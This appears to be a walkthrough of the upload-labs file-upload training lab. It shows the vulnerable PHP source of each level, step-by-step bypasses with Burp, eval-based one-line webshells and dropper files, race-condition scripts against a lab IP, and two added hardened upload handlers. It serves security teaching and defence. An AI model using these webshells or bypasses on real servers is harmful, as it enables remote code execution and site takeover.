upload_labs

pass-1: front-end validation

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // file types allowed for upload
    var allow_ext = ".jpg|.png|.gif";
    // extract the extension of the selected file
    var ext_name = file.substring(file.lastIndexOf("."));
    // lastIndexOf() returns the index of the last occurrence of the given value; substring() with a single argument takes everything from that index to the end
    // check whether this type may be uploaded
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        // the extension is not in the allowed list
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

This function runs as JavaScript in the browser, so there are two ways around it:

1. Disable JavaScript in the browser.

2. Rename the webshell to an allowed extension, intercept the request with Burp, and change the name back to the real extension.

pass-2: MIME validation

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

The MIME type is carried in the request as the Content-Type of the file part, and since the client sets it there are two ways to bypass this check:

1. Upload the webshell as-is, intercept with Burp, and change the Content-Type in the request.

2. Rename the webshell to an image extension, intercept with Burp, and change the extension back in the request.

Common MIME types:

HTML document: text/html;

plain ASCII document: text/html;

JPEG image: image/jpeg;

GIF image: image/gif;

JavaScript file: application/javascript;

XML file: application/xml;

PNG image: image/png

pass-3: filtering of .asp|.aspx|.php|.jsp extensions

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        // check whether a file or directory named UPLOAD_PATH exists
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        // trim() strips surrounding whitespace, against the trailing-space bypass
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.'); // strrchr() finds the last "." in $file_name and returns everything from there to the end of the string
        $file_ext = strtolower($file_ext); // lower-case, against the case bypass
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip surrounding whitespace again

        if(!in_array($file_ext, $deny_ext)) {
            // is $file_ext absent from $deny_ext?
            $temp_file = $_FILES['upload_file']['tmp_name'];
            // $_FILES['upload_file']['tmp_name'] is the temporary name the server gave the file after upload, normally system-assigned
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Method: change the webshell's php extension to one of phtml, phtm, PHP5, PHP3 and so on.

HTML with embedded PHP uses the phtml extension; a file written entirely in PHP uses php. The web server passes both kinds of file to the PHP interpreter.

Reference: "Fixing phpStudy's Apache not parsing files with non-.php extensions such as .php5 and .phtml (php shows FcgidInitialEnv invalid)", CSDN blog

pass-4: .htaccess file upload

Uploading files with these extensions is forbidden: .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf!

Method: create a file named .htaccess with the following content:

# aaa.png here is the file name of the webshell that will be uploaded
AddType application/x-httpd-php aaa.png

<FilesMatch 'aaa.jpg'>
SetHandler application/x-httpd-php
</FilesMatch>

and so on.

.htaccess is a per-directory Apache configuration file; here it makes the server parse the png file as PHP.

Then upload the webshell as aaa.png.

pass-5: .user.ini bypass / dot-space-dot bypass

Source:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // lower-case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip surrounding whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Method 1:

Upload a .user.ini file with this content:

auto_prepend_file=aaa.txt

Then upload the webshell as aaa.txt and visit readme.php.

Method 2:

Upload the webshell aaa.php, intercept the request, append ". ." (dot, space, dot) to the extension, and access the file directly.

Why it works: following the source logic, one dot and one space are stripped, leaving an empty extension that is not in the blacklist, so the file is stored.

pass-6: case bypass

Source:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip surrounding whitespace

Compared with the previous level, the lower-casing of the extension is missing.

Method: upload the webshell as aaa.PHp

Back-end code bypasses

pass-7: space bypass

    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // lower-case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA

Compared with pass-5, the source lacks the trim() call that strips whitespace.

Method: upload the webshell aaa.php, intercept, and add a space after the file name.

pass-8: trailing-dot bypass

    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // lower-case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // strip surrounding whitespace

Compared with pass-5, the source lacks the deldot() call that strips trailing dots.

Method: upload the webshell aaa.php, intercept, and add a dot after the file name.

pass-9: alternate data stream bypass

    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // lower-case
        $file_ext = trim($file_ext); // strip surrounding whitespace

Compared with pass-5, the removal of the ::$DATA stream suffix is missing.

Method: upload the webshell aaa.php, intercept, append ::$DATA to the file name, then access the uploaded file with the ::$DATA removed.

pass-10: dot-space-dot bypass

Method: upload the webshell aaa.php, intercept, and append ". ." to the file name.

pass-11: double-write bypass

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        // replace every substring that matches an entry of $deny_ext with the empty string
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Key function: str_ireplace($deny_ext,"", $file_name);

Method: upload the webshell aaa.php, intercept, and change the file name to aaa.pphphp

pass-12: null-byte truncation with %00

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    // substr(a, b [, c]): a is the string, b the start offset, c the optional length; returns that part of a
    // strrpos() finds the position of the last occurrence of a substring in a string

    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

Prerequisites:

1. PHP version lower than 5.3.4

2. magic_quotes_gpc set to Off in php.ini

Method:

Upload the webshell as aaa.png, intercept, append aaa.php%00 to the save_path parameter, then access the uploaded file with the trailing png name removed.

pass-13: null-byte truncation with 0x00

The source is almost identical to pass-12; the save_path parameter is read from POST instead of GET.

Method:

Upload the webshell as aaa.png, intercept, and change save_path to ../upload/aaa.php

Add a space after this value, select the space, and in the Hex view on the right change its byte to 00.

Access the uploaded file with the jpg name removed.

pass-14: file-header bypass / file inclusion

JPEG file signature: starts with FFD8, ends with FFD9

PNG file signature: 89 50 4E 47 0D 0A

GIF file signature: GIF89a or GIF87a

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

Idea: craft the image webshell -> upload it -> include it through file inclusion

Method:

1. This level checks only the first two bytes, so the image content can be replaced as long as those two bytes are kept, as in the figure.

Steps: open a normal jpg/png/gif in 010 Editor, delete every byte after the first two, put the one-line webshell in their place, and save. Upload that file and use it through the file inclusion.

2. Alternatively, prefix the file content with GIF89a or GIF87a directly in the Burp request.

Access via file inclusion succeeds.

pass-15: image webshell vs getimagesize() / file inclusion

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

Key function: getimagesize() returns an array of image information, in order: width, height, the image type constant (which image_type_to_extension() turns into a file extension), and a string of image attributes.

Method: make an image webshell with the Windows copy command and reference it through file inclusion.

pass-16: image webshell vs exif_imagetype() / file inclusion

function isImage($filename){
    // requires the php_exif extension to be enabled
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

Key function: exif_imagetype() reads the first bytes of the image and checks its signature (much like the previous level).

Method: same as the previous level.

Difference between exif_imagetype() and getimagesize(): getimagesize() returns an array of image information, in order width, height, the image type constant (convertible with image_type_to_extension()), and a string of image attributes, whereas exif_imagetype() only checks the signature and is faster.

pass-17: second rendering

if (isset($_POST['submit'])){
    // basic information about the upload: file name, type, size, temporary path
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // extension of the uploaded file
    $fileext= substr(strrchr($filename,"."),1);

    // check extension and type; only a valid file is processed
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                // give the new image a file name
                srand(time());
                $newfilename = strval(rand()).".jpg";
                // serve the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                // give the new image a file name
                srand(time());
                $newfilename = strval(rand()).".png";
                // serve the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                // give the new image a file name
                srand(time());
                $newfilename = strval(rand()).".gif";
                // serve the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

Key function: imagecreatefromjpeg(), used to rebuild the image file.

Idea: find the parts that stay identical between the re-rendered file and the original and write the webshell into one of them; the result then survives re-rendering (for png too little of the file survives, so jpg or gif is recommended).

Method:

Upload a normal image, preferably a gif.

Fetch that image back from the server. Open 010 Editor, choose Compare Files (Ctrl+M) in the top right, select the original and the uploaded copy, and click Match below (blue marks the unchanged regions); insert the one-line webshell into an unchanged region (preferably toward the end).

Upload the jpg file with the inserted webshell and access it through the file-inclusion vulnerability.

PS: some gif files may fail because, once the file is included as PHP, the image bytes around the payload can form invalid PHP syntax.

pass-18: race-condition bypass

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    // temporary path
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;
    // save path

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

At this level the upload is written first and checked afterwards: the file is already on the server when the check runs, and it is deleted only if the check fails.

Idea: use a tool to upload the big shell repeatedly while requesting it at the same time; if a request reaches it, it writes a small shell, and that small shell is not deleted.

Method: make a big shell (dama.php)

<?php fputs(fopen('../upload/shell1.php','w'),'<?php @eval($_POST["x"]);?>');?>

Use Burp to upload dama.php repeatedly (upload dama.php -> intercept -> send to Intruder -> payload type Null payloads -> start).

While it uploads, request dama.php repeatedly (request -> intercept -> send to Intruder -> Null payloads -> start).

Or request it with Python:

import requests
url = "http://192.168.175.138:81/upload/dama.php"
while True:
    html = requests.get(url)
    if (html.status_code==200):
        print('ok')
        break
    else:
        print("发包中")
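For pass-14 to pass-18 the defence is to check the content of the temporary file and re-encode it before anything is written under the web root; the handler below is an added example, not upload-labs code, and assumes the lab's UPLOAD_PATH constant, the upload_file form field and PHP with GD.

```php
<?php
// Added example, not upload-labs code. Assumes the lab's UPLOAD_PATH
// constant and a form field still named upload_file.

const IMAGE_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Validate and re-encode an entry of $_FILES while it is still the
 * temporary file. Returns the stored path on success, else an error.
 */
function store_image(array $upload): string {
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        return 'no valid upload';
    }
    // 1. Sniff the real format from the header. Unlike pass-14 this parses
    //    the whole header; unlike pass-2 it ignores the client's Content-Type.
    $info = @getimagesize($upload['tmp_name']);
    if ($info === false || !isset(IMAGE_TYPES[$info[2]])) {
        return 'not a supported image';
    }
    $ext = IMAGE_TYPES[$info[2]];
    // 2. The client's extension must agree with the sniffed type, so a
    //    file named aaa.php with a GIF89a prefix (pass-14) is refused
    //    instead of being stored as .gif.
    $declared = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    if ($declared === 'jpeg') {
        $declared = 'jpg';
    }
    if ($declared !== $ext) {
        return 'extension does not match content';
    }
    // 3. Decode and re-encode into a new file (the pass-17 approach). GD
    //    rebuilds the pixel data and drops comment and metadata segments,
    //    the usual hiding place; the file name is server-generated.
    $im = @imagecreatefromstring(file_get_contents($upload['tmp_name']));
    if ($im === false) {
        return 'image could not be decoded';
    }
    $dest = UPLOAD_PATH . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if ($ext === 'jpg') {
        $ok = imagejpeg($im, $dest, 85);
    } elseif ($ext === 'png') {
        $ok = imagepng($im, $dest);
    } else {
        $ok = imagegif($im, $dest);
    }
    imagedestroy($im);
    // 4. Nothing touched UPLOAD_PATH before this point: all checks ran on
    //    the temporary file, so the pass-18 race has no window.
    return $ok ? $dest : 'write failed';
}

if (isset($_POST['submit'], $_FILES['upload_file'])) {
    echo htmlspecialchars(store_image($_FILES['upload_file'])), "\n";
}
```

Re-encoding alone does not stop the pass-17 technique of writing into regions GD leaves unchanged, so the upload directory must also be served with no PHP handler and with AllowOverride None, which neutralises the .htaccess of pass-4 and the multi-extension parsing of pass-19.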

pass-19: Apache parsing issue + race condition

Setup: uploading an image at first showed it saved one directory above upload; reviewing the code, the function that sets the save directory is wrong.

Change the highlighted part of the setDir function to what the figure shows.

Apache behaviour: when reading a file name the server scans extensions from right to left; if it does not recognise the rightmost one, it keeps reading toward the left.

Source analysis: in the previous level the server received the file first, stored it as a temporary file and checked the extension at the same time, keeping it if valid and deleting it otherwise. In this level the server checks the extension first; an invalid file is never stored, and a valid one is stored and then renamed.

Idea: upload a file whose extension passes the check but which Apache does not recognise, e.g. dama.php.7z, so that Apache falls back to the extension before it. The server stores the file and then renames it to timestamp+7z, but before the rename Apache parses it as dama.php.

Method: create dama.php

<?php fputs(fopen('../upload/shell.php','w'),'<?php @eval($_POST["aaa"])?>');?>

1. Upload, intercept, change dama.php to dama.php.7z, and send to Intruder.

2. Request 192.168.175.138:81/upload/dama.php.7z, intercept, and send to Intruder.

Select Null payloads and send both an unlimited number of times.

Start the requests to 192.168.175.138:81/upload/dama.php.7z first,

then start uploading dama.php.7z.

(Tested: it must be done in this order, otherwise the file is not generated.)

shell.php is generated.

Access it.

Success!

pass-20: summary of extension bypasses

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
        // pathinfo() with PATHINFO_EXTENSION returns everything after the last dot
        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

1. .user.ini bypass

2. trailing dot / dot-space / dot-space-dot / dot-slash

3. %00 or 0x00

pass-21: array extension bypass

if(!empty($_FILES['upload_file'])){
    // check the MIME type
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        // check the file name
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
            // split the file name into an array at each "."
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

Source analysis:

After the upload, the server first checks the file's MIME type.

It then picks the file name with a ternary expression and splits it into an array at each ".".

The last element of the array is checked against the allowed extensions.

The file is saved under the name formed from the first element plus the element at index (number of elements minus one).

Method: upload the one-line webshell aaa.php

Intercept

Change the Content-Type

Turn the Content-Disposition name into an array, as in the figure:

save_name[0] here must end in php

The last save_name[] must be an allowed extension

Access it (without the trailing ".")

Success!
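The fix these blacklist levels call for is an allowlist that rejects anything not of the form stem.ext, added here as an example that is not part of upload-labs; it covers the name tricks of pass-3 to pass-13, pass-19, pass-20 and pass-21 and assumes the lab's UPLOAD_PATH constant and PHP 7.1 or later.

```php
<?php
// Added example, not upload-labs code. Assumes the lab's UPLOAD_PATH
// constant; the stored name never uses anything the client sent.

const ALLOWED_EXT = ['jpg', 'png', 'gif'];

/**
 * Return the canonical extension when $name is exactly "stem.ext" with an
 * allowed ext, otherwise null. Nothing is stripped or rewritten: a name
 * that would need cleaning is rejected, so there is no blacklist to slip past.
 */
function allowed_extension($name): ?string {
    // pass-21: save_name[] arrives as an array; only a string is acceptable.
    if (!is_string($name)) {
        return null;
    }
    // pass-12/13: NUL and other control bytes never belong in a file name.
    if (preg_match('/[\x00-\x1f\x7f]/', $name)) {
        return null;
    }
    // pass-9: NTFS alternate data stream suffix.
    if (stripos($name, '::$DATA') !== false) {
        return null;
    }
    // pass-13/19: ignore any directory part such as ../upload/.
    $base = basename($name);
    // Non-empty stem, exactly one dot, short alphanumeric extension. A
    // trailing "." or " " (pass-5/7/8/10), "php.7z" (pass-19), ".htaccess"
    // and ".user.ini" (pass-4/5) all fail this pattern.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})\z/', $base, $m)) {
        return null;
    }
    // pass-6: case-insensitive, but compared against the allowlist only.
    $ext = strtolower($m[1]);
    return in_array($ext, ALLOWED_EXT, true) ? $ext : null;
}

/** The stored name is built from the extension alone; the client's stem is discarded. */
function stored_path(string $ext): string {
    return UPLOAD_PATH . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
}

// Names from the levels above, run through the check (expected result on the right).
$samples = [
    ['aaa.png',           'png'],
    ['aaa.PHp',           null],  // pass-6
    ['aaa.php ',          null],  // pass-7
    ['aaa.php.',          null],  // pass-8
    ['aaa.php::$DATA',    null],  // pass-9
    ['aaa.php. .',        null],  // pass-5 / pass-10
    ['aaa.pphphp',        null],  // pass-11
    ["aaa.php\0.png",     null],  // pass-12 / pass-13
    ['../upload/aaa.php', null],  // pass-13 save_path
    ['aaa.php.7z',        null],  // pass-19
    ['.htaccess',         null],  // pass-4
    ['.user.ini',         null],  // pass-5
    [['aaa.php', 'jpg'],  null],  // pass-21 save_name[]
];
foreach ($samples as [$name, $want]) {
    $verdict = allowed_extension($name) === $want ? 'ok' : 'MISMATCH';
    printf("%-26s %s\n", json_encode($name), $verdict);
}
```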
